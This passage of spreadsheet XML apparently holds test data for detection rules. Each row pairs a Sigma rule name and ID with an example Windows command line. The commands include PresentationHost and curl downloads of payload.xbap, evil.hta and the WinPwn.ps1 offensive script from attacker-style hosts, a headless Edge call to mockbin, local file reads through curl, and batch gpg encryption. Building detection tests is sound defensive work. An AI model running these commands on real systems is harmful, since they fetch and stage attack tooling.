      <c r="J3572" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3573" ht="15.75" customHeight="1" s="42">
      <c r="A3573" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3573" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3573" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3573" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe - http://192.168.1.50/share/payload.xbap</t>
        </is>
      </c>
      <c r="F3573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3573" s="43" t="n"/>
      <c r="J3573" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3574" ht="15.75" customHeight="1" s="42">
      <c r="A3574" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3574" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3574" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3574" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe \\192.168.1.50\share\payload.xbap</t>
        </is>
      </c>
      <c r="F3574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3574" s="43" t="n"/>
      <c r="J3574" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3575" ht="15.75" customHeight="1" s="42">
      <c r="A3575" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C3575" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D3575" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E3575" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F3575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3575" s="43" t="n"/>
      <c r="J3575" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3576" ht="15.75" customHeight="1" s="42">
      <c r="A3576" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C3576" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D3576" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E3576" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://run.mocky.io/12345678-90ab-cdef-ghij-klmnopqrstuv</t>
        </is>
      </c>
      <c r="F3576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3576" s="43" t="n"/>
      <c r="J3576" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3577" ht="15.75" customHeight="1" s="42">
      <c r="A3577" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C3577" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D3577" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E3577" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709#fragment</t>
        </is>
      </c>
      <c r="F3577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3577" s="43" t="n"/>
      <c r="J3577" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3578" ht="15.75" customHeight="1" s="42">
      <c r="A3578" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3578" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3578" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3578" s="43" t="inlineStr">
        <is>
          <t>curl.exe --cookie-jar cookie http://example.com</t>
        </is>
      </c>
      <c r="F3578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3578" s="43" t="n"/>
      <c r="J3578" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3579" ht="15.75" customHeight="1" s="42">
      <c r="A3579" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3579" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3579" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3579" s="43" t="inlineStr">
        <is>
          <t>curl.exe -c cookie "http://example.com"</t>
        </is>
      </c>
      <c r="F3579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3579" s="43" t="n"/>
      <c r="J3579" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3580" ht="15.75" customHeight="1" s="42">
      <c r="A3580" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3580" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3580" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3580" s="43" t="inlineStr">
        <is>
          <t>curl.exe --cookie-jar=cookie http://example.com</t>
        </is>
      </c>
      <c r="F3580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3580" s="43" t="n"/>
      <c r="J3580" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3581" ht="15.75" customHeight="1" s="42">
      <c r="A3581" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3581" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3581" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3581" s="43" t="inlineStr">
        <is>
          <t>curl.exe -H 'User-Agent: EvilAgent' http://example.com</t>
        </is>
      </c>
      <c r="F3581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3581" s="43" t="n"/>
      <c r="J3581" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3582" ht="15.75" customHeight="1" s="42">
      <c r="A3582" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3582" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3582" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3582" s="43" t="inlineStr">
        <is>
          <t>curl.exe -H "User-Agent: EvilAgent" http://example.com</t>
        </is>
      </c>
      <c r="F3582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3582" s="43" t="n"/>
      <c r="J3582" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3583" ht="15.75" customHeight="1" s="42">
      <c r="A3583" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3583" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3583" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3583" s="43" t="inlineStr">
        <is>
          <t>curl.exe -H User-Agent: EvilAgent http://example.com</t>
        </is>
      </c>
      <c r="F3583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3583" s="43" t="n"/>
      <c r="J3583" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3584" ht="15.75" customHeight="1" s="42">
      <c r="A3584" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3584" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3584" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3584" s="43" t="inlineStr">
        <is>
          <t>curl.exe --header 'User-Agent: EvilAgent' http://example.com</t>
        </is>
      </c>
      <c r="F3584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3584" s="43" t="n"/>
      <c r="J3584" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3585" ht="15.75" customHeight="1" s="42">
      <c r="A3585" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_exec</t>
        </is>
      </c>
      <c r="C3585" s="43" t="inlineStr">
        <is>
          <t>File Download From IP URL Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3585" s="43" t="inlineStr">
        <is>
          <t>9cc85849-3b02-4cb5-b371-3a1ff54f2218</t>
        </is>
      </c>
      <c r="E3585" s="43" t="inlineStr">
        <is>
          <t>curl --output hello.txt "https://12.34.56.78/hack/evil.txt"</t>
        </is>
      </c>
      <c r="F3585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3585" s="43" t="n"/>
      <c r="J3585" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3586" ht="15.75" customHeight="1" s="42">
      <c r="A3586" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3586" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3586" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3586" s="43" t="inlineStr">
        <is>
          <t>curl -O 'https://12.34.56.78/hack/evil.hta'</t>
        </is>
      </c>
      <c r="F3586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3586" s="43" t="n"/>
      <c r="J3586" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3586" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3587" ht="15.75" customHeight="1" s="42">
      <c r="A3587" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3587" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3587" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3587" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3587" s="43" t="inlineStr">
        <is>
          <t>curl --output=evil.hta https://12.34.56.78/hack/evil.hta</t>
        </is>
      </c>
      <c r="F3587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3587" s="43" t="n"/>
      <c r="J3587" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3587" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3588" ht="15.75" customHeight="1" s="42">
      <c r="A3588" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3588" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3588" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3588" s="43" t="inlineStr">
        <is>
          <t>curl --output evil.hta https://12.34.56.78/hack/evil.hta</t>
        </is>
      </c>
      <c r="F3588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3588" s="43" t="n"/>
      <c r="J3588" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3588" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3589" ht="15.75" customHeight="1" s="42">
      <c r="A3589" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C3589" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From File Sharing Domain Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3589" s="43" t="inlineStr">
        <is>
          <t>56454143-524f-49fb-b1c6-3fb8b1ad41fb</t>
        </is>
      </c>
      <c r="E3589" s="43" t="inlineStr">
        <is>
          <t>curl --output "https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1"</t>
        </is>
      </c>
      <c r="F3589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3589" s="43" t="n"/>
      <c r="J3589" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3590" ht="15.75" customHeight="1" s="42">
      <c r="A3590" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C3590" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From File Sharing Domain Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3590" s="43" t="inlineStr">
        <is>
          <t>56454143-524f-49fb-b1c6-3fb8b1ad41fb</t>
        </is>
      </c>
      <c r="E3590" s="43" t="inlineStr">
        <is>
          <t>curl -O https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1</t>
        </is>
      </c>
      <c r="F3590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3590" s="43" t="n"/>
      <c r="J3590" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3590" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3591" ht="15.75" customHeight="1" s="42">
      <c r="A3591" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_insecure_connection</t>
        </is>
      </c>
      <c r="C3591" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3591" s="43" t="inlineStr">
        <is>
          <t>cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec</t>
        </is>
      </c>
      <c r="E3591" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Curl.exe -k" https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll" -o c:\users\public\music\allthethingsx64.dll</t>
        </is>
      </c>
      <c r="F3591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3591" s="43" t="n"/>
      <c r="J3591" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3591" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3592" ht="15.75" customHeight="1" s="42">
      <c r="A3592" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_insecure_connection</t>
        </is>
      </c>
      <c r="C3592" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3592" s="43" t="inlineStr">
        <is>
          <t>cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec</t>
        </is>
      </c>
      <c r="E3592" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Curl.exe --insecure https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll</t>
        </is>
      </c>
      <c r="F3592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3592" s="43" t="n"/>
      <c r="J3592" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3592" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3593" ht="15.75" customHeight="1" s="42">
      <c r="A3593" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3593" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3593" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3593" s="43" t="inlineStr">
        <is>
          <t>curl file:///C:\Users\xodih\AppData\Local\Temp\calc.dll</t>
        </is>
      </c>
      <c r="F3593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3593" s="43" t="n"/>
      <c r="J3593" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3594" ht="15.75" customHeight="1" s="42">
      <c r="A3594" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3594" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3594" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3594" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3594" s="43" t="inlineStr">
        <is>
          <t>curl -k "file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll"</t>
        </is>
      </c>
      <c r="F3594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3594" s="43" t="n"/>
      <c r="J3594" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3594" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3595" ht="15.75" customHeight="1" s="42">
      <c r="A3595" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3595" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3595" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3595" s="43" t="inlineStr">
        <is>
          <t>curl file:///C:/Users/xodih/AppData/Local/Temp/calc.dll</t>
        </is>
      </c>
      <c r="F3595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3595" s="43" t="n"/>
      <c r="J3595" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3595" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3596" ht="15.75" customHeight="1" s="42">
      <c r="A3596" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpg4win_encryption</t>
        </is>
      </c>
      <c r="C3596" s="43" t="inlineStr">
        <is>
          <t>File Encryption Using Gpg4win</t>
        </is>
      </c>
      <c r="D3596" s="43" t="inlineStr">
        <is>
          <t>550bbb84-ce5d-4e61-84ad-e590f0024dcd</t>
        </is>
      </c>
      <c r="E3596" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\GnuPG\bin\gpg.exe" -c --passphrase 'SomeParaphraseBlah' --batch --yes "C:\Users\thaim\AppData\Local\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F3596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3596" s="43" t="n"/>
      <c r="J3596" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3596" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3597" ht="15.75" customHeight="1" s="42">
      <c r="A3597" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpg4win_encryption</t>
        </is>
      </c>
      <c r="C3597" s="43" t="inlineStr">
        <is>
          <t>File Encryption Using Gpg4win</t>
        </is>
      </c>
      <c r="D3597" s="43" t="inlineStr">
        <is>
          <t>550bbb84-ce5d-4e61-84ad-e590f0024dcd</t>
        </is>
      </c>
      <c r="E3597" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\GnuPG\bin\gpg.exe" -c --passphrase='SomeParaphraseBlah' --batch --yes "C:\Users\thaim\AppData\Local\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F3597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3597" s="43" t="n"/>
      <c r="J3597" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3597" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3598" ht="15.75" customHeight="1" s="42">
      <c r="A3598" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3598" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpg4win_susp_location</t>
        </is>
      </c>
      <c r="C3598" s="43" t="inlineStr">
        <is>
          <t>File Encryption/Decryption Via Gpg4win From Suspicious Locations</t>
        </is>
      </c>
      <c r="D3598" s="43" t="inlineStr">
        <is>
          <t>e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d</t>
        </is>
      </c>
      <c r="E3598" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\GnuPG\bin\gpg.exe" --passphrase='SomeParaphraseBlah' --batch --yes -c "C:\Users\thaim\AppData\Local\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F3598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3598" s="43" t="n"/>
      <c r="J3598" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3598" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3599" ht="15.75" customHeight="1" s="42">
      <c r="A3599" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B3599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpg4win_susp_location</t>
        </is>
      </c>
      <c r="C3599" s="43" t="inlineStr">
        <is>
          <t>File Encryption/Decryption Via Gpg4win From Suspicious Locations</t>
        </is>
      </c>
      <c r="D3599" s="43" t="inlineStr">
        <is>
          <t>e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d</t>
        </is>
      </c>
      <c r="E3599" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\GnuPG\bin\gpg.exe" -passphrase 'SomeParaphraseBlah' --batch --yes -c "C:\Users\thaim\AppData\Local\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F3599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3599" s="43" t="b">
        <v>0</v>
      </c>
